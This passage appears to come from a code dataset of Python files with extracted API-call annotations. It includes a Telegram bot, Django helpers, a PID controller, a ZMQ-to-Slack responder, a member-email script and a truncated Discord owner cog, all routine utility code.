default=\n 'pending', max_length=20)\n", (1617, 1766), False, 'from django.db import migrations, models\n'), ((2057, 3154), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('%d-%m-%Y', 'dd-mm-yyyy'), ('%d/%m/%Y', 'dd/mm/yyyy'), ('%d.%m.%Y',\n 'dd.mm.yyyy'), ('%d-%Y-%m', 'dd-yyyy-mm'), ('%d/%Y/%m', 'dd/yyyy/mm'),\n ('%d.%Y.%m', 'dd.yyyy.mm'), ('%m-%d-%Y', 'mm-dd-yyyy'), ('%m/%d/%Y',\n 'mm/dd/yyyy'), ('%m.%d.%Y', 'mm.dd.yyyy'), ('%m-%Y-%d', 'mm-yyyy-dd'),\n ('%m/%Y/%d', 'mm/yyyy/dd'), ('%m.%Y.%d', 'mm.yyyy.dd'), ('%Y-%d-%m',\n 'yyyy-dd-mm'), ('%Y/%d/%m', 'yyyy/dd/mm'), ('%Y.%d.%m', 'yyyy.dd.mm'),\n ('%Y-%m-%d', 'yyyy-mm-dd'), ('%Y/%m/%d', 'yyyy/mm/dd'), ('%Y.%m.%d',\n 'yyyy.mm.dd'), ('%d-%m-%y', 'dd-mm-yy'), ('%d/%m/%y', 'dd/mm/yy'), (\n '%d.%m.%y', 'dd.mm.yy'), ('%d-%y-%m', 'dd-yy-mm'), ('%d/%y/%m',\n 'dd/yy/mm'), ('%d.%y.%m', 'dd.yy.mm'), ('%m-%d-%y', 'mm-dd-yy'), (\n '%m/%d/%y', 'mm/dd/yy'), ('%m.%d.%y', 'mm.dd.yy'), ('%m-%y-%d',\n 'mm-yy-dd'), ('%m/%y/%d', 'mm/yy/dd'), ('%m.%y.%d', 'mm.yy.dd'), (\n '%y-%d-%m', 'yy-dd-mm'), ('%y/%d/%m', 'yy/dd/mm'), ('%y.%d.%m',\n 'yy.dd.mm'), ('%y-%m-%d', 'yy-mm-dd'), ('%y/%m/%d', 'yy/mm/dd'), (\n '%y.%m.%d', 'yy.mm.dd')]", 'default': '"""%d-%m-%Y"""', 'max_length': '(50)'}), "(choices=[('%d-%m-%Y', 'dd-mm-yyyy'), ('%d/%m/%Y',\n 'dd/mm/yyyy'), ('%d.%m.%Y', 'dd.mm.yyyy'), ('%d-%Y-%m', 'dd-yyyy-mm'),\n ('%d/%Y/%m', 'dd/yyyy/mm'), ('%d.%Y.%m', 'dd.yyyy.mm'), ('%m-%d-%Y',\n 'mm-dd-yyyy'), ('%m/%d/%Y', 'mm/dd/yyyy'), ('%m.%d.%Y', 'mm.dd.yyyy'),\n ('%m-%Y-%d', 'mm-yyyy-dd'), ('%m/%Y/%d', 'mm/yyyy/dd'), ('%m.%Y.%d',\n 'mm.yyyy.dd'), ('%Y-%d-%m', 'yyyy-dd-mm'), ('%Y/%d/%m', 'yyyy/dd/mm'),\n ('%Y.%d.%m', 'yyyy.dd.mm'), ('%Y-%m-%d', 'yyyy-mm-dd'), ('%Y/%m/%d',\n 'yyyy/mm/dd'), ('%Y.%m.%d', 'yyyy.mm.dd'), ('%d-%m-%y', 'dd-mm-yy'), (\n '%d/%m/%y', 'dd/mm/yy'), ('%d.%m.%y', 'dd.mm.yy'), ('%d-%y-%m',\n 'dd-yy-mm'), ('%d/%y/%m', 'dd/yy/mm'), ('%d.%y.%m', 'dd.yy.mm'), (\n '%m-%d-%y', 'mm-dd-yy'), ('%m/%d/%y', 'mm/dd/yy'), 
('%m.%d.%y',\n 'mm.dd.yy'), ('%m-%y-%d', 'mm-yy-dd'), ('%m/%y/%d', 'mm/yy/dd'), (\n '%m.%y.%d', 'mm.yy.dd'), ('%y-%d-%m', 'yy-dd-mm'), ('%y/%d/%m',\n 'yy/dd/mm'), ('%y.%d.%m', 'yy.dd.mm'), ('%y-%m-%d', 'yy-mm-dd'), (\n '%y/%m/%d', 'yy/mm/dd'), ('%y.%m.%d', 'yy.mm.dd')], default='%d-%m-%Y',\n max_length=50)\n", (2073, 3154), False, 'from django.db import migrations, models\n'), ((4316, 4412), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""hordak.StatementImport"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'hordak.StatementImport')\n", (4333, 4412), False, 'from django.db import migrations, models\n'), ((4661, 4754), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (4677, 4754), False, 'from django.db import migrations, models\n'), ((4851, 4885), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {}), '()\n', (4883, 4885), False, 'from django.db import migrations, models\n'), ((4964, 5043), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(100)', 'verbose_name': '"""Column"""'}), "(blank=True, default='', max_length=100, verbose_name='Column')\n", (4980, 5043), False, 'from django.db import migrations, models\n'), ((5134, 5444), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'choices': "[(None, '-- Do not import --'), ('date', 'Date'), ('amount', 'Amount'), (\n 'amount_out', 'Amount (money in only)'), ('amount_in',\n 'Amount (money out only)'), ('description', 'Description / Notes')]", 'default': 'None', 'max_length': '(20)', 'null': '(True)', 'verbose_name': '"""Is"""'}), "(blank=True, choices=[(None, '-- Do not import --'), (\n 'date', 'Date'), ('amount', 'Amount'), ('amount_out',\n 'Amount (money in only)'), ('amount_in', 'Amount (money out only)'), (\n 'description', 'Description / Notes')], default=None, max_length=20,\n null=True, verbose_name='Is')\n", (5150, 5444), False, 'from django.db import migrations, models\n'), ((5837, 5893), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'default': '""""""', 'max_length': '(200)'}), "(blank=True, default='', max_length=200)\n", (5853, 5893), False, 'from django.db import migrations, models\n'), ((5976, 6098), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""columns"""', 'to': '"""hordak.TransactionImport"""'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='columns', to='hordak.TransactionImport')\n", (5993, 6098), False, 'from django.db import migrations, models\n')]
devilnotcry77/devil_not_cry
Bot Telegram.py
a9d342d053c788ec6db2d1c5967ed55104b40045
from aiogram import Bot, types
from aiogram.dispatcher import Dispatcher
from aiogram.utils import executor

TOKEN = "Token for your bot"

bot = Bot(token=TOKEN)
dp = Dispatcher(bot)


@dp.message_handler(commands=['start', 'help'])
async def send_welcome(msg: types.Message):
    # Reply with a greeting: "Welcome, <first name>".
    await msg.reply(f'Добро пожаловать, {msg.from_user.first_name}')


@dp.message_handler(content_types=['text'])
async def get_text_messages(msg: types.Message):
    # Answer "Hi!" to "hi" (привет), otherwise "I don't understand".
    if msg.text.lower() == 'привет':
        await msg.answer('Привет!')
    else:
        await msg.answer('Я не понимаю')


if __name__ == '__main__':
    executor.start_polling(dp)
[((146, 162), 'aiogram.Bot', 'Bot', ([], {'token': 'TOKEN'}), '(token=TOKEN)\n', (149, 162), False, 'from aiogram import Bot, types\n'), ((169, 184), 'aiogram.dispatcher.Dispatcher', 'Dispatcher', (['bot'], {}), '(bot)\n', (179, 184), False, 'from aiogram.dispatcher import Dispatcher\n'), ((620, 646), 'aiogram.utils.executor.start_polling', 'executor.start_polling', (['dp'], {}), '(dp)\n', (642, 646), False, 'from aiogram.utils import executor\n')]
danlgz/django-wysiwyg-redactor
redactor/utils.py
755927ea2cb9db203c4a002b4da7ebfbf989dd64
from django.core.exceptions import ImproperlyConfigured
from importlib import import_module

try:
    from django.utils.encoding import force_text
except ImportError:
    from django.utils.encoding import force_unicode as force_text

from django.utils.functional import Promise

import json


def import_class(path):
    path_bits = path.split('.')

    if len(path_bits) < 2:
        message = "'{0}' is not a complete Python path.".format(path)
        raise ImproperlyConfigured(message)

    class_name = path_bits.pop()
    module_path = '.'.join(path_bits)
    module_itself = import_module(module_path)

    if not hasattr(module_itself, class_name):
        message = "The Python module '{0}' has no '{1}' class.".format(
            module_path,
            class_name
        )
        raise ImportError(message)

    return getattr(module_itself, class_name)


def is_module_image_installed():
    try:
        from PIL import Image
        from PIL import ImageFile
    except ImportError:
        try:
            import Image
            import ImageFile
        except ImportError:
            return False
    return True


class LazyEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Promise):
            return force_text(obj)
        return super(LazyEncoder, self).default(obj)


def json_dumps(data):
    return json.dumps(data, cls=LazyEncoder)
[((582, 608), 'importlib.import_module', 'import_module', (['module_path'], {}), '(module_path)\n', (595, 608), False, 'from importlib import import_module\n'), ((1364, 1397), 'json.dumps', 'json.dumps', (['data'], {'cls': 'LazyEncoder'}), '(data, cls=LazyEncoder)\n', (1374, 1397), False, 'import json\n'), ((460, 489), 'django.core.exceptions.ImproperlyConfigured', 'ImproperlyConfigured', (['message'], {}), '(message)\n', (480, 489), False, 'from django.core.exceptions import ImproperlyConfigured\n'), ((1260, 1275), 'django.utils.encoding.force_unicode', 'force_text', (['obj'], {}), '(obj)\n', (1270, 1275), True, 'from django.utils.encoding import force_unicode as force_text\n')]
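A short usage sketch for the two public helpers above, runnable in any environment with Django installed; the dotted path and the lazy value are arbitrary examples, not values taken from the redactor package:

# Usage sketch; the inputs are examples only.
from django.utils.functional import lazy

from redactor.utils import import_class, json_dumps

encoder_cls = import_class('json.JSONEncoder')   # resolves a dotted path to the class
lazy_label = lazy(lambda: 'Upload', str)()       # a Promise, like gettext_lazy() results
payload = json_dumps({'label': lazy_label})   # LazyEncoder forces the Promise to plain text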
DrGFreeman/PyTools
timedpid.py
795e06b5a07f49a990df3c545d2d103b16dd8b4d
# timedpid.py
# Source: https://github.com/DrGFreeman/PyTools
#
# MIT License
#
# Copyright (c) 2017 Julien de la Bruere-Terreault <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

# This module defines a simple Proportional - Integral - Derivative (PID)
# controller with different time step calculation methods. This is a python
# implementation of my Arduino TimedPID library which can be found at
# https://github.com/DrGFreeman/TimedPID. Refer to this repository for detailed
# documentation.

import time


class TimedPID:

    # Constructor
    def __init__(self, kp = 1., ki = 0., kd = 0.):
        self._kp = kp
        self._ki = ki
        self._kd = kd
        self._cmdMin = None
        self._cmdMax = None
        self._boundRange = False
        self._errorIntegral = 0.
        self._errorPrevious = 0.
        self._lastCmdTime = time.time()

    def getCmd(self, setPoint, procVar):
        """Gets the PID command without time step.
        setPoint is the desired process set point,
        procVar is the current value of the process variable to be controlled.
        No time step is used (assumed = 1)."""

        # Calculate error terms
        error = setPoint - procVar
        self._errorIntegral += error
        errorDerivative = error - self._errorPrevious

        # Set last error to current error
        self._errorPrevious = error

        # Calculate command
        cmd = self._kp * error + self._ki * self._errorIntegral + \
            self._kd * errorDerivative

        # Return bound command
        return self._boundCmd(cmd)

    def getCmdAutoStep(self, setPoint, procVar):
        """Gets the PID command with automatic time step calculation.
        setPoint is the desired process set point,
        procVar is the current value of the process variable to be controlled.
        The time step is calculated as the time since the last call to the method."""

        # Calculate time step
        currentTime = time.time()
        timeStep = currentTime - self._lastCmdTime

        # Set last time method was called to current time
        self._lastCmdTime = currentTime

        # Get command
        return self.getCmdStep(setPoint, procVar, timeStep)

    def getCmdStep(self, setPoint, procVar, timeStep):
        """Gets the PID command with a specified time step.
        setPoint is the desired process set point,
        procVar is the current value of the process variable to be controlled,
        timeStep is the time step."""

        # Calculate error terms
        error = setPoint - procVar
        self._errorIntegral += (error + self._errorPrevious) / 2 * timeStep
        errorDerivative = (error - self._errorPrevious) / timeStep

        # Set last error to current error
        self._errorPrevious = error

        # Calculate command
        cmd = self._kp * error + self._ki * self._errorIntegral + \
            self._kd * errorDerivative

        # Return bound command
        return self._boundCmd(cmd)

    def setCmdRange(self, cmdMin, cmdMax):
        """Sets the maximum command range.
        Commands calculated outside the cmdMin and cmdMax will be set to
        cmdMin or cmdMax respectively."""

        self._cmdMin = cmdMin
        self._cmdMax = cmdMax
        self._boundRange = True

    def setGains(self, kp = 1., ki = 0., kd = 0.):
        """Sets the proportional, integral and derivative terms."""
        self._kp = kp
        self._ki = ki
        self._kd = kd

    def reset(self):
        """Resets the PID error terms and timer."""
        self._errorIntegral = 0.
        self._errorPrevious = 0.
        self._lastCmdTime = time.time()

    # Private methods

    def _boundCmd(self, cmd):
        """Bounds the command within the range _cmdMin to _cmdMax."""
        if self._boundRange:
            if cmd < self._cmdMin:
                cmd = self._cmdMin
            elif cmd > self._cmdMax:
                cmd = self._cmdMax
        return cmd
[((1876, 1887), 'time.time', 'time.time', ([], {}), '()\n', (1885, 1887), False, 'import time\n'), ((2996, 3007), 'time.time', 'time.time', ([], {}), '()\n', (3005, 3007), False, 'import time\n'), ((4658, 4669), 'time.time', 'time.time', ([], {}), '()\n', (4667, 4669), False, 'import time\n')]
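A short usage sketch for the class above, assuming timedpid.py is on the import path; the gains, clamp range and the simulated plant are arbitrary example values:

# Example only: a crude simulated first-order process, not part of the library.
from timedpid import TimedPID

pid = TimedPID(kp=2.0, ki=0.5, kd=0.1)
pid.setCmdRange(-10.0, 10.0)          # clamp the command output

setpoint = 50.0
temperature = 20.0
for _ in range(100):
    cmd = pid.getCmdStep(setpoint, temperature, 0.1)
    temperature += 0.1 * cmd          # toy plant response
print(round(temperature, 2))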
bernd-clemenz/pmon
pmon/zmq_responder.py
8b61de4864ffed2d7ee224c283090ed1948533ae
#
# -*- coding: utf-8 -*-
# receives messages via zmq and executes some simple
# operations.
#
# (c) ISC Clemenz & Weinbrecht GmbH 2018
#

import json

import requests
import zmq

import pmon


class ZmqResponder(object):
    context = None
    socket = None

    def __init__(self):
        """
        Constructor.
        """
        self.cfg = pmon.CFG
        self.log = pmon.LOG

    def __enter__(self):
        self.bind()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.done()

    def bind(self):
        self.log.info("Binding ZMQ")
        port = self.cfg['pmon']['zmq.port']
        bind_str = "tcp://*:{0}".format(port)
        self.context = zmq.Context(1)
        self.socket = self.context.socket(zmq.REP)
        self.socket.bind(bind_str)

    def done(self):
        self.log.info("Disconnecting ZMQ")
        if self.socket is not None:
            self.socket.close()
        if self.context is not None:
            self.context.term()

    def _read_message(self):
        self.log.debug("Wait for incoming message")
        msg = self.socket.recv()
        _msg = msg.decode('utf-8')
        return json.loads(_msg)

    @staticmethod
    def _make_slack_payload(message):
        slack_payload = dict()
        slack_payload['text'] = message['msg']
        attachments = list()
        slack_payload['attachments'] = attachments
        attachment = dict()
        attachment["fallback"] = message['msg']
        attachment['text'] = message['msg']
        attachment['title'] = message['msg.type']
        attachment['author_name'] = message['from']
        attachments.append(attachment)
        return slack_payload

    def _report_message_to_slack(self, message):
        """
        Send a message to Slack Web-Hook.

        :param message: the message record to be sent to slack
        :return: None
        """
        self.log.debug("Forwarding message to slack")
        url = self.cfg['pmon']['slack.hook']
        payload = json.dumps(self._make_slack_payload(message))
        headers = {'Accept': 'application/json',
                   'Content-Type': 'application/json',
                   'Content-Encoding': 'utf8',
                   'Content-Length': str(len(payload))}
        try:
            rsp = requests.post(url, data=payload, headers=headers)
            if rsp.status_code != requests.codes.ok:
                self.log.warn("problem sending to slack: {0}".format(rsp.status_code))
        except Exception as x:
            self.log.error(str(x))

    def respond(self):
        go_on = True
        while go_on:
            message = self._read_message()
            self.log.debug("Message: {0}, {1}".format(message['msg.type'], message['msg']))
            self.socket.send_string('ACK')
            try:
                self._report_message_to_slack(message)
            except Exception as x:
                self.log.error(str(x))
            go_on = True if message['msg'] != 'stop' else False
[((693, 707), 'zmq.Context', 'zmq.Context', (['(1)'], {}), '(1)\n', (704, 707), False, 'import zmq\n'), ((1160, 1176), 'json.loads', 'json.loads', (['_msg'], {}), '(_msg)\n', (1170, 1176), False, 'import json\n'), ((2287, 2336), 'requests.post', 'requests.post', (['url'], {'data': 'payload', 'headers': 'headers'}), '(url, data=payload, headers=headers)\n', (2300, 2336), False, 'import requests\n')]
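The responder above expects a JSON object with 'msg.type', 'msg' and 'from' keys and always replies with 'ACK'. A minimal matching REQ client; the port and field values are illustrative, the real port comes from the pmon configuration's 'zmq.port' entry:

# Hypothetical client for the REP socket above; adjust the port to match the config.
import json
import zmq

context = zmq.Context(1)
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:5555")

message = {"msg.type": "status", "msg": "disk almost full", "from": "pmon-agent"}
socket.send_string(json.dumps(message))
print(socket.recv().decode("utf-8"))   # expected reply: ACK

# Sending 'stop' as the msg makes the responder loop exit.
socket.send_string(json.dumps({"msg.type": "control", "msg": "stop", "from": "pmon-agent"}))
print(socket.recv().decode("utf-8"))

socket.close()
context.term()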
sanskrit/padmini
test/test_substitute.py
8e7e8946a7d2df9c941f689ea4bc7b6ebb7ca1d0
from padmini import operations as op


def test_yatha():
    before = ("tAs", "Tas", "Ta", "mip")
    after = ("tAm", "tam", "ta", "am")
    for i, b in enumerate(before):
        assert op.yatha(b, before, after) == after[i]


"""
def test_ti():
    assert S.ti("ta", "e") == "te"
    assert S.ti("AtAm", "e") == "Ate"


def test_antya():
    assert S.antya("ti", "u") == "tu"
    assert S.antya("te", "Am") == "tAm"
"""
[((188, 214), 'padmini.operations.yatha', 'op.yatha', (['b', 'before', 'after'], {}), '(b, before, after)\n', (196, 214), True, 'from padmini import operations as op\n')]
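Only the test is included in this row, but it pins down the behaviour: yatha maps an element of the before tuple to the element of after at the same position. A hypothetical one-line reconstruction, purely for illustration and not padmini's actual implementation:

# Hypothetical reconstruction inferred from test_yatha above.
def yatha(item, before, after):
    """Return the element of `after` at the index `item` occupies in `before`."""
    return after[before.index(item)]


assert yatha("Tas", ("tAs", "Tas", "Ta", "mip"), ("tAm", "tam", "ta", "am")) == "tam"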
kmhambleton/LSST-TVSSC.github.io
TVSaffiliations/extractemails_nogui.py
2391fcdeddf83321825532aa7d7682b5dcf567f0
# coding: utf-8

# just prints the emails of members of a group to stdout,
# both primary and secondary members
# run as
# $python extractemails_nogui.py "Tidal Disruption Events"

from __future__ import print_function

__author__ = 'Federica Bianco, NYU - GitHub: fedhere'

import sys
import pandas as pd
from argparse import ArgumentParser

from config import tvsfile


def parse_args(subglist):
    """Use ArgParser to build up the arguments we will use in our script."""
    stored_args = {}
    # get the script name without the extension & use it to build up
    # the json filename
    parser = ArgumentParser(description='Selecting members by subgroup')
    parser.add_argument('subgroup',
                        action='store',
                        default=None,
                        help='Choose the subgroup affiliation:' +
                        ' -- '.join([s for s in subglist]))
    args = parser.parse_args()
    return args


if __name__ == '__main__':
    if tvsfile is None:
        print("Required Argument: Google Doc file identifier (if you do not have it email federica!)")
        sys.exit()

    TVSMembers = pd.read_csv('https://docs.google.com/spreadsheets/d/' +
                             tvsfile + '/export?gid=0&format=csv',
                             index_col=0)
    subgroups = TVSMembers.primary.unique()
    conf = parse_args([x for x in subgroups if str(x) != 'nan'])

    primary = conf.subgroup
    secondary = conf.subgroup

    emails = TVSMembers[TVSMembers.primary == primary]['email'].values
    print("These are the members with primary affiliation with " + primary)
    print("")
    print(' '.join([em + ',' for em in emails]))

    emails = TVSMembers[(TVSMembers.secondary == secondary) |
                        (TVSMembers['secondary.1'] == secondary) |
                        (TVSMembers['secondary.2'] == secondary)]['email'].values
    print("\n")
    print("These are the members with secondary affiliation with " + secondary)
    print("")
    print(' '.join([em + ',' for em in emails]))

    print("")
    print("If you also want their names and affiliations use: ")
    print("$python extractemailsW.py " + conf.subgroup)
[((604, 663), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""Selecting members by subgroup"""'}), "(description='Selecting members by subgroup')\n", (618, 663), False, 'from argparse import ArgumentParser\n'), ((1147, 1257), 'pandas.read_csv', 'pd.read_csv', (["('https://docs.google.com/spreadsheets/d/' + tvsfile +\n '/export?gid=0&format=csv')"], {'index_col': '(0)'}), "('https://docs.google.com/spreadsheets/d/' + tvsfile +\n '/export?gid=0&format=csv', index_col=0)\n", (1158, 1257), True, 'import pandas as pd\n'), ((1118, 1128), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1126, 1128), False, 'import sys\n')]
Obsidian-Development/JDBot
cogs/owner.py
315b0782126ac36fe934ac3ba2d7132710d58651
from discord.ext import commands, menus import utils import random , discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy import traceback, textwrap from discord.ext.menus.views import ViewMenuPages class Owner(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command(brief="a command to send mail") async def mail(self, ctx, *, user: utils.BetterUserconverter = None): if user is None: await ctx.reply("User not found, returning Letter") user = ctx.author if user: await ctx.reply("Please give me a message to use.") message = await self.bot.wait_for("message",check = utils.check(ctx)) embed_message = discord.Embed(title=message.content, timestamp=(message.created_at), color=random.randint(0, 16777215)) embed_message.set_author(name=f"Mail from: {ctx.author}",icon_url=(ctx.author.display_avatar.url)) embed_message.set_footer(text = f"{ctx.author.id}") embed_message.set_thumbnail(url = "https://i.imgur.com/1XvDnqC.png") if (user.dm_channel is None): await user.create_dm() try: await user.send(embed=embed_message) except: user = ctx.author await user.send(content="Message failed. sending",embed=embed_message) embed_message.add_field(name="Sent To:",value=str(user)) await self.bot.get_channel(855217084710912050).send(embed=embed_message) @commands.command() async def load(self, ctx, *, cog = None): if cog: try: self.bot.load_extension(cog) except Exception as e: await ctx.send(e) traceback.print_exc() await ctx.send("Loaded cog(see if there's any errors)") if cog is None: await ctx.send("you can't ask to load no cogs.") @commands.command() async def reload(self, ctx, *, cog = None): cog = cog or "all" if cog == "all": for x in list(self.bot.extensions): try: self.bot.reload_extension(x) except commands.errors.ExtensionError as e: await ctx.send(e) traceback.print_exc() await ctx.send("done reloading all cogs(check for any errors)") else: try: self.bot.reload_extension(cog) except commands.errors.ExtensionError as e: await ctx.send(e) traceback.print_exc() await ctx.send("Cog reloaded :D (check for any errors)") @commands.command() async def unload(self, ctx, *, cog = None): if cog: try: self.bot.unload_extension(cog) except commands.errors.ExtensionError as e: await ctx.send(e) traceback.print_exc() await ctx.send("Cog should be unloaded just fine :D.(check any errors)") if cog is None: await ctx.send("you can't ask to reload no cogs") @commands.command() async def shutdown(self, ctx): await ctx.send("shutdown/logout time happening.") await self.bot.close() async def cog_check(self, ctx): return await self.bot.is_owner(ctx.author) async def cog_command_error(self, ctx, error): if ctx.command or not ctx.command.has_error_handler(): await ctx.send(error) traceback.print_exc() #I need to fix all cog_command_error @commands.command(brief="Changes Bot Status(Owner Only)") async def status(self , ctx , * , args=None): if await self.bot.is_owner(ctx.author): if args: await self.bot.change_presence(status=discord.Status.do_not_disturb, activity= discord.Activity(type=discord.ActivityType.watching,name=args)) if args is None: await self.bot.change_presence(status=discord.Status.do_not_disturb) if await self.bot.is_owner(ctx.author) is False: await ctx.send("That's an owner only command") @commands.command(brief="Only owner command to change bot's nickname") async def change_nick(self, ctx ,*, name=None): if await self.bot.is_owner(ctx.author): if isinstance(ctx.channel, discord.TextChannel): await ctx.send("Changing Nickname") try: await ctx.guild.me.edit(nick=name) except 
discord.Forbidden: await ctx.send("Appears not to have valid perms") if isinstance(ctx.channel,discord.DMChannel): await ctx.send("You can't use that in Dms.") if await self.bot.is_owner(ctx.author) is False: await ctx.send("You can't use that command") class ServersEmbed(menus.ListPageSource): async def format_page(self, menu, item): embed = discord.Embed(title="Servers:",description=item,color=random.randint(0, 16777215)) return embed @commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only)") async def servers(self, ctx): if await self.bot.is_owner(ctx.author): pag = commands.Paginator() for g in self.bot.guilds: pag.add_line(f"[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}") pages = [page.strip("`") for page in pag.pages] menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True) if (ctx.author.dm_channel is None): await ctx.author.create_dm() await menu.start(ctx, channel = ctx.author.dm_channel) if await self.bot.is_owner(ctx.author) is False: await ctx.send("You can't use that it's owner only") @commands.command(brief="only works with JDJG, but this command is meant to send updates to my webhook") async def webhook_update(self, ctx, *, args = None): if await self.bot.is_owner(ctx.author): if args: if isinstance(ctx.channel, discord.TextChannel): try: await ctx.message.delete() except: await ctx.send("It couldn't delete the message in this guils so, I kept it here.") webhook = discord.Webhook.from_url(os.environ["webhook1"], session = self.bot.session) embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at)) embed.add_field(name="Update Info:",value=args) embed.set_author(name="JDJG's Update",icon_url='https://i.imgur.com/pdQkCBv.png') embed.set_footer(text="JDJG's Updates") await webhook.send(embed=embed) webhook=discord.Webhook.from_url(os.environ["webhook99"], session = self.bot.session) embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at)) embed.add_field(name="Update Info:",value=args) embed.set_author(name="JDJG's Update",icon_url='https://i.imgur.com/pdQkCBv.png') embed.set_footer(text="JDJG's Updates") await webhook.send(embed=embed) if args is None: await ctx.send("You sadly can't use it like that.") if await self.bot.is_owner(ctx.author) is False: await ctx.send("You can't use that") @commands.command(brief="Commands to see what guilds a person is in.") async def mutualguilds(self, ctx, *, user: utils.BetterUserconverter = None): user = user or ctx.author pag = commands.Paginator() for g in user.mutual_guilds: pag.add_line(f"{g}") pages = [page.strip("`") for page in pag.pages] pages = pages or ["No shared servers"] menu = ViewMenuPages(utils.mutualGuildsEmbed(pages, per_page=1),delete_message_after = True) if (ctx.author.dm_channel is None): await ctx.author.create_dm() await menu.start(ctx, channel = ctx.author.dm_channel) @commands.command(brief="A command to add sus_users with a reason") async def addsus(self, ctx, *, user: utils.BetterUserconverter = None): if user is None: await ctx.send("can't have a user be none.") if user: await ctx.reply("Please give me a reason why:") reason = await self.bot.wait_for("message",check= utils.check(ctx)) cur = await self.bot.sus_users.cursor() await cur.execute("INSERT INTO sus_users VALUES (?, ?)", (user.id, reason.content)) await self.bot.sus_users.commit() await cur.close() await ctx.send("added sus users, succesfully") 
@commands.command(brief="a command to remove sus users.") async def removesus(self, ctx, *, user: utils.BetterUserconverter = None): if user is None: await ctx.send("You can't have a none user.") if user: cur = await self.bot.sus_users.cursor() await cur.execute("DELETE FROM sus_users WHERE user_id = ?", (user.id,)) await self.bot.sus_users.commit() await cur.close() await ctx.send("Removed sus users.") class SusUsersEmbed(menus.ListPageSource): async def format_page(self, menu, item): embed=discord.Embed(title = "Users Deemed Suspicious by JDJG Inc. Official", color = random.randint(0, 16777215)) embed.add_field(name = f"User ID : {item[0]}", value = f"**Reason :** {item[1]}", inline = False) return embed @commands.command(brief="a command to grab all in the sus_users list") async def sus_users(self, ctx): cur = await self.bot.sus_users.cursor() cursor = await cur.execute("SELECT * FROM SUS_USERS;") sus_users = tuple(await cursor.fetchall()) await cur.close() await self.bot.sus_users.commit() menu = ViewMenuPages(self.SusUsersEmbed(sus_users, per_page=1),delete_message_after=True) await menu.start(ctx) @sus_users.error async def sus_users_error(self, ctx, error): await ctx.send(error) class TestersEmbed(menus.ListPageSource): async def format_page(self, menu, item): embed = discord.Embed(title = "Testing Users:", color = random.randint(0, 16777215)) embed.add_field(name = "User ID:", value = f"{item}", inline = False) return embed @commands.command(brief = "a command listed all the commands") async def testers(self, ctx): menu = ViewMenuPages(self.TestersEmbed(self.bot.testers, per_page = 1), delete_message_after = True) await menu.start(ctx) @commands.command() async def update_sus(self, ctx): await self.bot.sus_users.commit() await ctx.send("Updated SQL boss.") @update_sus.error async def update_sus_error(self, ctx, error): await ctx.send(error) @commands.command(aliases=["bypass_command"]) async def command_bypass(self, ctx ,user: utils.BetterUserconverter = None, *, command = None): #make sure to swap to autoconverter if it gets added. user = user or ctx.author if command: command_wanted=self.bot.get_command(command) if command_wanted: await ctx.send(f"{command_wanted.name} now accessible for the {user} for one command usage!") self.bot.special_access[user.id]=command_wanted.name if command_wanted is None: await ctx.send("Please specify a valid command.") if command is None: await ctx.send("select a command :(") @commands.command(brief = "resets cooldown for you.",aliases = ["reset_cooldown"]) async def resetcooldown(self, ctx, *, command = None): if not command: return await ctx.send("please specificy a command") command_wanted = self.bot.get_command(command) if not command_wanted: return await ctx.send("please specify a command") if not command_wanted.is_on_cooldown(ctx): return await ctx.send("That doesn't have a cooldown/isn't on a cooldown.") command_wanted.reset_cooldown(ctx) await ctx.send(f"reset cooldown of {command_wanted}") @commands.command(brief = "leaves a guild only use when needed or really wanted. 
